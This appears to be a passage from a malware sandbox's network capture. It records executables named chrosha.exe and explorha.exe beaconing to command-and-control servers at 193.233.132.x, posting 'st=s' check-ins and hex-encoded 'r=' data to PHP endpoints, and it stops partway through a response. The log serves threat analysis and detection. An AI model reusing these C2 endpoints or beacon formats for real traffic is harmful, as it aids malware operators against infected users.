                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      561192.168.2.550406193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:33.869157076 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:34.118304968 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      562192.168.2.550407193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:33.881031990 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:34.125248909 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      563192.168.2.550408193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:34.369216919 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:34.619044065 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      564192.168.2.550409193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:34.375514984 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:34.626148939 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      565192.168.2.550410193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:34.970312119 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:35.213387966 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      566192.168.2.550411193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:34.994910002 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:35.246093035 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      567192.168.2.550412193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:35.466778040 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:35.717772007 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      568192.168.2.550413193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:35.495186090 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:35.745094061 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      569192.168.2.550414193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:36.063841105 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:36.302973032 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      570192.168.2.550415193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:36.102509975 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:36.349877119 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      571192.168.2.550416193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:36.550277948 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:36.801739931 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      572192.168.2.550417193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:36.600192070 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:36.851176023 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      573192.168.2.550418193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:37.167632103 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:37.416115046 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      574192.168.2.550419193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:37.209405899 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:37.453845978 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      575192.168.2.550420193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:37.664644003 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:37.912349939 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      576192.168.2.550421193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:37.697608948 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:37.942133904 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      577192.168.2.550422193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:38.277050972 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:38.528007030 CEST197INHTTP/1.1 200 OK
